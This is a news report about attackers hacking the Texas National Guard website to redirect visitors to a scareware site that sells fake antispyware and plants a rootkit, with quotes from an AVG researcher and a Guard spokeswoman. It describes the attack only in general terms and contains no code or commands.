Attackers have hacked the Web site of the Texas National Guard and are using it to serve up offers of fake security software and plant rootkits on unpatched PCs, a security researcher said today.

The National Guard's site was hacked sometime before yesterday, said Roger Thompson, the chief research officer of Czech Republic-based security vendor AVG Technologies Cz SRO. Thompson confirmed Thursday that the site was still pushing phony antispyware software and infecting users with a rootkit.

"It's still infective," Thompson said today in an instant message exchange. "I did a refresh, and [it] whacked me."

A spokeswoman for the Texas National Guard, Chief Master Sergeant Gonda Moncada, acknowledged the hack midday. "We are aware of the situation and are working hard to fix it," she said in an e-mail.

According to Thompson's original analysis, malicious code planted on the agency's site sends the visitor's browser to the hacker site. "[That's] probably in Russia," said Thompson, "[but I] can't confirm it, because the ISP for the host is not answering whois queries."

The malicious site tries to trick users into forking over money for fake security software, said Thompson. "If you're not patched, when you close your browser, you find that your desktop has changed," he said, referring to a pop-up message that claims the user's PC is infected with spyware.

"This machine is now hopelessly nailed, and code has been installed in the background, and their pitch is that they'll remove it for a mere $49.95, and insert your credit card number here, please," said Thompson.

In the background, the attackers also plant a rootkit, software that hides malware to make it tougher for legitimate security software to sniff out and snuff attack code.

Moncada did not respond to other questions, including when the site would be cleansed of the malicious code and how it had gotten onto the site.